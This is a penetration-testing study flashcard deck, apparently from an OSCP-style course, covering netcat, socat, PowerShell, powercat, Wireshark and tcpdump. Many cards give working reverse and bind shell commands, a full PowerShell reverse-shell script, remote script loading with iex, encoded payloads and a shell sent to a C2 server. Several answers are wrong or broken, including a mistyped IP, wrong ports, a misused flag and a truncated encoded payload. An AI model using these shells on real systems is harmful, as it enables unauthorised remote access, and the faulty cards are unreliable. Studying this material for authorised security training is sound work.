Practical Tools Flashcards
1
Q
5 often used practical tools.
A
Netcat, Socat, PowerShell, Wireshark, and Tcpdump.
2
Q
What is netcat?
A
Netcat, first released in 1995 by Hobbit is one of the “original” network penetration testing tools and is so versatile that it lives up to the author’s designation as a hacker’s “Swiss army knife”. The clearest definition of Netcat is from Hobbit himself: a simple “utility which reads and writes data across network connections, using TCP or UDP protocols.”
3
Q
How to use netcat?
A
nc
4
Q
What ‘-n’ option do in Netcat?
A
Skip DNS name resolution.
5
Q
What ‘-v’ option do in Netcat?
A
Add some verbosity.
6
Q
What netcat arguments are required?
A
The destination IP address; and the destination port number.
7
Q
How to check with netcat if TCP port 110 (the POP3 mail service) is open on 10.11.0.22.
A
nc -nv 10.11.0.22 110
8
Q
How to use nc to connect to a POP3 service?
A
nc -nv 10.11.0.22 110
9
Q
How to set up Netcat to listen for incoming connections on TCP port 4444?
A
nc -nlvp 4444
10
Q
What ‘-n’ option do in netcat?
A
Disable DNS name resolution.
11
Q
What ‘-l’ option do in netcat?
A
Create a listener.
12
Q
What ‘-v’ option do in netcat?
A
Add some verbosity.
13
Q
What ‘-p’ option do in netcat?
A
Specify the listening port number.
14
Q
How to set up a listener using netcat on port 4444?
A
nc -nlvp 4444
15
Q
How to connect to a listener using netcat on port 4444 and local address?
A
nc -nv 127.0.0.1 4444
16
Q
What is dd in netcat?
A
Disk copying utility.
17
Q
What is dd in netcat?
A
Disk copying utility.
18
Q
How to use netcat, to receive a file “incoming.exe” on port 4444?
A
nc -nlvp 4444 > incoming.exe
19
Q
How to use netcat to transfer a “wget.exe” file in “/usr/share/windows-resources/binaries” to another computer which is listening on port 4444 and have IP 10.11.0.22?
A
nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
20
Q
What ‘-e’ option do in netcat?
A
Executes a program after making or receiving a successful connection.
21
Q
How to check ip on windows?
A
ipconfig
22
Q
How to use netcat to set up a bind shell on port 4444, which give remote access to command prompt?
A
nc -nlvp 4444 -e cmd.exe
23
Q
How to use netcat to connect to a bind shell on port 4444 and IP 10.11.0.22?
A
nc -nv 10.11.0.22 4444
24
Q
How to use nc to set up a listener in order to receive a reverse shell on port 4444?
A
nc -nlvp 4444
25
How to use netcat to send a reverse shell to IP 10.11.0.22 on port 4444?
nc -nv 10.11.0.22 4444 -e /bin/bash
26
How to reverse shell from Kali to Windows on port 4444, also IP on Windows Machine is 192.168.1.111?
Windows: ncat -nlvp 4444 -e cmd.exe
Linux: nc -nv 192.168.1.111 4444
27
Reverse shell from Windows to Kali on port 4444, Kali IP address is 172.20.176.78.
Linux: nc -nvlp 4444
Windows: ncat -nv 172.20.176.78 4444 cmd.exe
28
Bind shell on Kali. Use your Windows system to connect to it. Windows IP 192.168.1.111, Port 4444
Windows: ncat -nlvp 4444|
Linux: nc 192.168.1.111 4444 -e /bin/bash
29
Bind shell on Windows. Use your Kali machine to connect to it.
Linux: nc -lvp 4444
Windows: ncat 192.168.17.129 4444 -e cmd.exe
30
How to transfer a file from your Kali machine to Windows? On port 4444, from the path "/usr/share/windows-resources/binaries/wget.exe" and save it as "incoming.exe". Windows IP address is 192.168.1.111.
Windows: ncat -nlvp 4444 > incoming.exe
Linux: nc -nv 192.168.1.111 4444 < /usr/share/windows-resources/binaries/wget.exe
31
How to transfer a file from Windows to Linux? On port 4444, send file "incoming.exe" and save it as "come.exe" on Linux Machine, which IP is 192.168.17.129.
Linux: nc -nlvp 4444 > come.exe
Windows: ncat -nv 192.168.17.129 4444 -e incoming.exe
32
What is socat?
Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. For penetration testing, it is similar to Netcat but has additional useful features.
33
How to use socat to connect to IP 10.11.1.5 at port 80?
socat - TCP4:10.11.1.5:80
34
How to create listener on port 443 using socat?
sudo socat TCP4-LISTEN:443 STDOUT
35
How to use socat to transfer a file names "secret_passwords.txt" on port 443?
sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
36
What does "fork" option do in socat?
Fork creates a child process once a connection is made to the listener, which allows multiple connections.
37
What does "file:" option do in socat?
"file:" specifies the name of a file to be transferred.
38
What "TCP4" option means in socat?
The TCP4 option specifies IPv4.
39
What does "file:" in socat specifies?
The local file name to save the file to.
40
What does "create" specifies in socat?
That a new file will be created.
41
How to create a file by echo? Named "secret_passwords.txt" and contains "123456" string.
echo "123456" > "secret_passwords.txt"
42
How to send file "secret_passwords.txt" from Kali to Windows through socat on port 443 and save it as "received_secret_paswords.txt"? Linux IP is 172.20.176.78.
Linux: sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
Windows: socat TCP4:127.20.176.78:443 file:received_secret_passwords.txt,create
43
How to open secret_passwords.txt file on Windows?
type secret_passwords.txt
44
What "-d -d" option do in socat?
Increase verbosity (showing fatal, error, warning, and notice messages).
45
What does "EXEC" option in socat?
Execute the given program once a remote connection is established.
46
How to use socat to send a reverse shell on IP address 10.11.0.22, on port 443?
socat TCP4:10.11.0.22:443 EXEC:/bin/bash
47
How to use socat to create a listener on port 443, with increased verbosity and with getting standard output?
socat -d -d TCP4-LISTEN:443 STDOUT
48
What "req" does in "openssl"?
req: initiate a new certificate signing request
49
What "-newkey" does in "openssl"?
generate a new private key
50
What "rsa:2048" does in "openssl"?
rsa:2048: use RSA encryption with a 2,048-bit key length.
51
What "-nodes" does in "openssl"?
-nodes: store the private key without passphrase protection
52
What "-keyout" does in "openssl"?
-keyout: save the key to a file
53
What "-x509" does in "openssl"?
-x509: output a self-signed certificate instead of a certificate request
54
What "-days" does in "openssl"?
-days: set validity period in days
55
What "-out" does in "openssl"?
-out: save the certificate to a file
56
What is OpenSSL?
OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer
Security (TLS v1) network protocols and related cryptography standards required by them.
The openssl program is a command line tool for using the various cryptography functions of OpenSSL's crypto
library from the shell. It can be used for
57
How to use socat to create an encrypted bin shell on port 443?
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
58
How to transfer file called 'powercat.ps1' from Linux machine to Windows system using socat? Path to powercat.ps1 is /usr/share/powershell-empire/empire/server/data/module_source/management/. Linux IP address is 192.168.17.129. Send it through port 443.
Linux: sudo socat TCP4-LISTEN:443,fork file:/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1
Windows: socat TCP4:192.168.17.129:443 file:powercat.ps1,create
59
PowerShell
Windows PowerShell is a task-based command line shell and scripting language. It is designed specifically for system administrators and power-users to rapidly automate the administration of multiple operating systems (Linux, macOS, Unix, and Windows) and the processes related to the applications that run on them.
60
Windows Powershell 5.0 on which OS?
Windows Server 2016, installed by default
Windows Server 2012 R2/Windows Server 2012/Windows Server 2008 R2 with Service Pack
1/Windows 8.1/Windows 7 with Service Pack 1 (install Windows Management Framework
5.0 to run it)
61
Windows Powershell 4.0 on which OS?
* Windows 8.1/Windows Server 2012 R2, installed by default
* Windows 7 with Service Pack 1/Windows Server 2008 R2 with Service Pack 1 (install Windows Management Framework 4.0 to run it)
62
Windows PowerShell 3.0 on which OS?
* Windows 8/Windows Server 2012, installed by default
* Windows 7 with Service Pack 1/Windows Server 2008 R2 with Service Pack 1/2 (install Windows Management Framework 3.0 to run it)
63
How to set an “Unrestricted” execution policy on our Windows client machine in PowerShell?
Set-ExecutionPolicy Unrestricted
64
How to use PowerShell to download a file "wget.exe" from Linux Machine (ip: 10.11.0.4) which started apache2, and save the file on Desktop?
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
65
What does '-c' option does in PowerShell prompt?
This will execute the supplied command (wrapped in double-quotes) as if it were typed at the PowerShell prompt.
66
How to host wget.exe on Kali machine by Apache Service?
sudo cp /usr/share/windows-resources/binaries/wget.exe /var/www/html
sudo systemctl start apache2
67
PowerShell reverse shell for IP address 10.11.0.4, port 443.
$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close();
68
How to use PowerShell to send a reverse shell?
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out- String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}
$client.Close()"
69
What does it do?
| powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);
Assign IP address and Port
70
What does it do? $stream = $client.GetStream();
Gets the network stream class.
71
What does it do? [byte[]]$bytes = 0..65535|%{0};
It's used as a buffer
72
What does it do? while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
It's a while loop reading the data to/from network stream.
73
What does it do? $client.Close()"
Close the client connection.
74
What is IEX?
Invoke-Expression
75
How to use nc to receive a reverse shell? Port 443
sudo nc -lnvp 443
76
How to use PowerShell to set up a bind shell?
powershell -c "
$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);
$listener.start();$client =
$listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes =
0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data =
(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =
(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '>
';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng
th);$stream.Flush()};$client.Close();$listener.Stop()"
77
How to use netcat to connect to a bind shell created using PowerShell? IP address of machine is 10.11.0.22 and port is 443.
nc -nv 10.11.0.22 443
78
What $listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443); does?
Listener variable using System.Net.Sockets.TcpListener class, this class requires 2 arguments, the listening address and port. ('0.0.0.0',443)
79
What is Powercat?
Powercat is essentially the PowerShell version of Netcat written by besimorhino. It is a script we can download to a Windows host to leverage the strengths of PowerShell and simplify the creation of bind/reverse shells. Powercat can be installed in Kali with apt install powercat, which will place the script in /usr/share/windows-resources/powercat.
80
How to install powercat on Linux?
apt install powercat
81
If you would install powercat with apt, where it will be placed?
/usr/share/windows-resources/powercat
82
Who created powercat?
Besimorhino
83
How to load a local PowerShell script using dot sourcing?
PS C:\Users\Offsec> . .\powercat.ps1
84
How to load a remote PowerShell script using iex? WWW address is https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1.
PS C:\Users\Offsec> iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
85
How to execute the powercat function directly in PowerShell?
PS C:\Users\offsec> powercat
86
How to print The Powercat help menu?
PS C:\Users\offsec> powercat -h
87
How to use netcat to set up a listener for powercat file transfer?
sudo nc -lnvp 443 > receiving_powercat.ps1
88
What '-c' option specifies in powercat?
Client mode, and sends the listening IP address.
89
What '-p' option specifies in powercat?
Specifies the port number to conenct to.
90
What '-i' option specifies in powercat?
Indicates the local file that will be transferred remotely.
91
How to use Powercat to send a file C:\Users\Offsec\powercat.ps1? We want to send it to machine with IP address 10.11.0.4 by port 443.
PS C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
92
How to use netcat to set up a listener in order to receive a reverse shell from powercat?
kali@kali:~$ sudo nc -lvp 443
93
How to use powercat in order to send a reverse shell?
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe
94
What '-e' option specifies in this command 'powercat -c 10.11.0.4 -p 443 -e cmd.exe'?
Application to execute (cmd.exe) once a connection is made to a listening port.
95
How to use powercat to set up a bind shell?
PS C:\Users\offsec> powercat -l -p 443 -e cmd.exe
96
What '-l' option in powercat do?
Create listener.
97
What '-p' option in powercat do?
Specify the listening port number.
98
What '-e' option in powercat do?
Application (cmd.exe) executed once connected
99
How to use netcat to connect to a bind shell created by powercat?
kali@kali:~$ nc 10.11.0.22 443
100
What is a payload?
Payload is a set of powershell instructions as well as the portion of the powercat script itself that only includes the features requested by the user.
101
How to create and execute a stand-alone payload?
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
PS C:\Users\offsec> ./reverseshell.ps1
102
How to create an encoded stand-alone payload with powercat?
PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
103
What '-E' option means in PowerShell?
EncodedCommand
104
How to execute an encoded stand-alone payload using PowerShell?
PS C:\Users\offsec> powershell.exe -EZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABAHIAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzACkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAsACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQByAHMACgAgACAAIAAgAGkAZgAoACQAZwBsAG8YgBhAGwAOgBWAGUAcgBiAG8AcwBlACkAewAkAFYAZQByAGIAbwBzAGUAIAA9ACAAJABUAHIAdQBlAH0ACgAgACAA
IAAgACQARgB1AG4AYwBWAGEAcgBzACAAPQAgAEAAewB9AAoAIAAgACAAIABpAGYAKAAhACQAbAApAAoAIAAgAC
AAIAB7AAoAIAAgACAAIAAgACAAJABGAHUAbgBjAFYAYQByAHMAWwAiAGwAIgBdACAAPQAgACQARgBhAGwAcwBl
AAoAIAAgACAAIAAgACAAJABTAG8AYwBrAGUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdA
BlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAKACAAIAAgACA
105
How to receive a stand-alone reverse shell?
kali@kali:~$ sudo nc -lnvp 443
106
Make reverse shell to connect to Windows from Linux machine and obtain cmd.exe. Port 9000, IP address 172.19.253.220.
kacper@hopper:$ nc -nvlp 9000
| C:\Users>ncat -nv 172.19.253.220 9000 -e cmd.exe
107
What is powercat?
Netcat: The powershell version.
108
Basic Connections in powercat?
Basic Client
Basic Listener
Basic Client, Output as Bytes
109
Basic Client command in powercat?
powercat -c 10.1.1.1 -p 443
110
Basic Listener command in powercat?
powercat -l -p 8000
111
Basic Client, Output as Bytes command in powercat?
powercat -c 10.1.1.1 -p 443 -o Bytes
112
Types of File Transfer in netcat?
Send File
| Receive File
113
How to send file by powercat?
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
114
How to receive file by Powercat?
powercat -l -p 8000 -of C:\inputfile
115
What can I do with shells by powercat?
Serve CMD Shell
Send CMD Shell
Serve a shell which executes powershell commands
116
How to serve a CMD Shell?
powercat -l -p 443 -e cmd
117
How to send a CMD Shell?
powercat -c 10.1.1.1 -p 443 -e cmd
118
How to serve a shell that executes PowerShell commands?
powercat -l -p 443 -ep
119
Powercat DNS and UDP functionalities
Send Data Over UDP
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows
120
Send Data Over UDP
powercat -c 10.1.1.1 -p 8000 -u
| powercat -l -p 8000 -u
121
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
122
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows
powercat -dns c2.example.com -e cmd
123
How Relays in netcat works?
Just like traditional netcat relays, but you don't have to create a file or start a second process. You can also relay data between connections of different protocols.
124
Type of Relays in netcat
```
TCP Listener to TCP Client Relay
TCP Listener to UDP Client Relay
TCP Listener to DNS Client Relay
TCP Listener to DNS Client Relay using the Windows Default DNS Server
TCP Client to Client Relay
TCP Listener to Listener Relay
```
125
TCP Listener to TCP Client Relay
powercat -l -p 8000 -r tcp:10.1.1.16:443
126
TCP Listener to UDP Client Relay
powercat -l -p 8000 -r udp:10.1.1.16:53
127
TCP Listener to DNS Client Relay
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
128
TCP Listener to DNS Client Relay using the Windows Default DNS Server
powercat -l -p 8000 -r dns:::c2.example.com
129
TCP Client to Client Relay
powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
130
TCP Listener to Listener Relay
powercat -l -p 8000 -r tcp:9000
131
TCP Listener to Listener Relay
powercat -l -p 8000 -r tcp:9000
132
Generate Payloads types
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443
Generate a bind tcp encoded command which listens on port 8000
133
How to generate a reverse tcp payload which connects back to 10.1.1.15 port 443 using powercat?
powercat -c 10.1.1.15 -p 443 -e cmd -g
134
How to generate a bind tcp encoded command which listens on port 8000 using powercat?
powercat -l -p 8000 -e cmd -ge
135
How to perform Basic TCP Port Scanner using powercat?
(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
136
How to Start A Persistent Server That Serves a File using powercat?
powercat -l -p 443 -i C:\inputfile -rep
137
How to set up listener on Linux on port 443?
sudo nc -lnvp 443
138
How to send files by powercat to Linux? You want to transfer file "powercat.ps1" which path is "C:\Users\boncz", on your Linux machine you want to get it through port 443, save as "receiving_powercat.ps1", and your IP address is 172.19.253.220.
kacper@hopper:~/powercat$ sudo nc -lnvp 443 > receiving_powercat.ps1
PS C:\Users\boncz> powercat -c 172.19.253.220 -p 443 -i C:\Users\boncz\powercat.ps1
139
PowerShell Reverse Shell important steps.
Get Powercat through Linux probably.
Dotsource Powercat.ps1.
IEX Powercat
Listen on Linux, then execute Reverse Shell on Windows PS with '-c' option.
140
How to create Bind Shell by Powercat?
PS C:\Users\boncz> powercat -l -p 443 -e cmd.exe
| kacper@hopper:$ nc -nv 192.168.1.111 443
141
How to set listening with powercat on port 443, with executable cmd.exe, and connect with another powercat to the cmd.exe? Destination IP is 192.168.1.111 and Destination Port is 443.
PS C:\Users\boncz> powercat -l -p 443 -e cmd.exe
| PS C:\Users\boncz> powercat -c 192.168.1.111 443
142
How to create ps script which is stand-alone payload in powercat? Destination IP is 172.19.253.220 and port is 443. You want to execute cmd.exe.
Linux: sudo nc -nlvp 44
PS: powercat -c 172.19.253.220 -p 443 -e cmd.exe -g > reverseshell.ps1
PS: ./reverseshell.ps1
143
How to create encoded reverse shell by powercat? Destination IP is 172.19.253.220, the destination port is 443, you want to execute cmd.exe on payload, and save file as "encodedreverseshell.ps1".
PS C:\Users\boncz> powercat -c 172.19.253.220 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
144
How to execute encrypted payload in powershell?
PS C:\> powershell.exe -E
| kacper@hopper:/mnt/c/WINDOWS/system32$ sudo nc -nlvp 443
145
What is Wireshark?
Wireshark, is a must-have tool for learning network protocols, analyzing network traffic, and debugging network services.
146
Which libraries Wireshark uses on Linux?
Libpcap
147
Which libraries Wireshark uses on Windows?
Winpcap
148
What capture filters do in Wireshark?
If we apply capture filters during a Wireshark session, any packets that do not match the filter criteria will be dropped and the remaining data is passed on to the capture engine.
149
What capture engine do in Wireshark?
Dissects the incoming packets, analyzes them, and finally applies any additional display filters before displaying the output.
150
Order from the Wire to Wireshark.
Network -> Capture Filters -> Capture Engine -> Display Filters
151
How to run Wireshark from terminal?
kali@kali:~$ sudo wireshark
152
Why do we use Capture Filters in Wireshark?
To reduce the amount of captured traffic by discarding any traffic that does not match our filter and narrow our focus to the packets we wish to analyze.
153
How to use net filter, to capture only traffic on the 10.11.1.0/24 address range?
net 10.11.1.0/24
154
How to connect ftp on ip 10.11.1.13?
kacper@hopper:/mnt/c/WINDOWS/system32$ ftp 10.11.1.13
155
How can you capture network traffic exactly for FTP connection estabilished on 10.11.1.13? What is capture and display filter for this?
Capture Filter: net 10.11.1.0/24
| Display Filter: tcp.port == 21
156
How to set a display filter for all traffic on port 21?
tcp.port == 21
157
How to follow a TCP stream in Wireshark?
RMB -> Follow -> TCP Stream
158
How to use display filter to only monitor traffic on port 110?
tcp.port == 110
159
What Exactly Is Port Filtering?
Port filtering represents a way of filtering packets (messages from different network protocols) based on their port number. These port numbers are used for TCP and UDP protocols, the best-known protocols for transmission. Port filtering represents a form of protection for your computer since, by port filtering, you can choose to allow or block certain ports to prevent different operations within the network.
160
How to capture only traffic to or from IP address 172.18.5.4?
host 172.18.5.4
161
How to capture traffic to or from a range of IP addresses? 192.168.x.x
net 192.168.0.0/24
or
net 192.168.0.0 mask 255.255.255.0
162
How to capture traffic from a range of IP addresses using Wireshark CaptureFilters?
src net 192.168.0.0/24
or
src net 192.168.0.0 mask 255.255.255.0
163
How to capture traffic to a range of IP addresses using CaptureFilters in Wireshark?
dst net 192.168.0.0/24
or
dst net 192.168.0.0 mask 255.255.255.0
164
How to capture only DNS (port 53) traffic using CaptureFilters in Wireshark?
port 53
165
DNS port
53
166
How to capture non-HTTP and non-SMTP traffic on your server? Let's say your domain is www.example.com.
host www.example.com and not (port 80 or port 25)
or
host www.example.com and not port 80 and not port 25
167
How to capture except all ARP and DNS traffic using CaptureFilters in Wireshark?
port not 53 and not arp
168
How to capture traffic within a range of ports using CaptureFilters in Wireshark?
(tcp[0:2] > 1500 and tcp[0:2] < 1550) or (tcp[2:2] > 1500 and tcp[2:2] < 1550)
or, with newer versions of libpcap (0.9.1 and later):
tcp portrange 1501-1549
169
What is libpcap library for?
Wireshark/TShark uses libpcap to capture live network data.
170
How to capture only Ethernet type EAPOL using CaptureFilters in Wireshark?
ether proto 0x888e
171
How to reject ethernet frames towards the Link Layer Discovery Protocol Multicast group using CaptureFilters using Wireshark?
not ether dst 01:80:c2:00:00:0e
172
How to capture only IPv4 traffic - the shortest filter, but sometimes very useful to get rid of lower layer protocols like ARP and STP using CaptureFilters in Wireshark?
ip
173
How to capture only unicast traffic - useful to get rid of noise on the network if you only want to see traffic to and from your machine, not, for example, broadcast and multicast announcements using CaptureFilters in Wireshark?
not broadcast and not multicast
174
How to capture IPv6 "all nodes" (router and neighbor advertisement) traffic using CaptureFilters in Wireshark?
dst host ff02::1
175
How to capture HTTP GET requests. This looks for the bytes 'G', 'E', 'T', and ' ' (hex values 47, 45, 54, and 20) just after the TCP header. "tcp[12:1] & 0xf0) >> 2" figures out the TCP header length using CaptureFilters in Wireshark?
port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420
176
Use the capture filter to only collect traffic on port 110.
tcp port 110
177
What is tcpdump?
Tcpdump is a text-based network sniffer that is streamlined, powerful, and flexible despite the lack of a graphical interface. It is by far the most commonly-used command-line packet analyzer and can be found on most Unix and Linux operating systems, but local user permissions determine the ability to capture network traffic.
178
How to use tcpdump to read packet capture named "password_cracking_filtered.pcap"?
kali@kali:~$ sudo tcpdump -r password_cracking_filtered.pcap
179
What '-n' option do in tcpdump?
Skip DNS name lookups.
180
What '-r' option do in tcpdump?
Read from packet capture file.
181
What 'sort | uniq -c' do?
Sort and count the number of times the field appears.
182
What 'head' do?
Display the first 10 lines of the output.
183
How to use tcpdump to read and filter the packet capture? We want to skip DNS name lookups, read from our packet capture filter named "password_cracking_filtered.pcap". Print the destination IP address and port, sort and count the numbers of times the field appears in the capture, respectively, and display only the first 10 lines of the output.
sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $5}' | sort | uniq -c | head.
184
What is src host in tcpdump?
Source host
185
What is dst host in tcpdump?
Destination host
186
How to filter by port number (81) using tcpdump?
-n port 81
187
How to filter source host 172.16.40.10 in file "password_cracking_filtered.pcap" using tcpdump?
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
188
How to filter destination host 172.16.40.10 in file "password_cracking_filtered.pcap" using tcpdump?
sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
189
How to filter by port number both source and destination traffic against port 81 in file "password_cracking_filtered.pcap"?
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
190
What '-X' option do in tcpdump?
Prints the packet data in both HEX and ASCII format.
191
How to use tcpdump to read the packet capture in hex/ascii output from file "password_cracking_filtered.pcap"?
sudo tcpdump -nX -r password_cracking_filtered.pcap
192
How to convert the binary bits (00011000) to decimal in bash?
kali@kali:~$ echo "$((2#00011000))"
193
How to use tcpdump to recreate the Wireshark exercise of capturing traffic on port 110.
sudo tcpdump port 80
194
How to use the -X flag to view the content of the packet. If data is truncated, investigate how the -s flag might help.
194
What '-X' option do in tcpdump?
-x When parsing and printing, in addition to printing the headers of each packet, print the data of each
packet (minus its link level header) in hex. The smaller of the entire packet or snaplen bytes will be
printed. Note that this is the entire link-layer packet, so for link layers that pad (e.g. Ethernet),
the padding bytes will also be printed when the higher layer packet is shorter than the required pad‐
ding.
195
What '-s' option do in tcpdump?
-s snaplen
--snapshot-length=snaplen
Snarf snaplen bytes of data from each packet rather than the default of 262144 bytes. Packets trun‐
cated because of a limited snapshot are indicated in the output with ``[|proto]'', where proto is the
name of the protocol level at which the truncation has occurred. Note that taking larger snapshots
both increases the amount of time it takes to process packets and, effectively, decreases the amount of
packet buffering. This may cause packets to be lost. You should limit snaplen to the smallest number
that will capture the protocol information you're interested in. Setting snaplen to 0 sets it to the
default of 262144, for backwards compatibility with recent older versions of tcpdump.
196
Wrapping up, what's practical tools you learned here?
Netcat, socat, tcpdump, wireshark, powershell
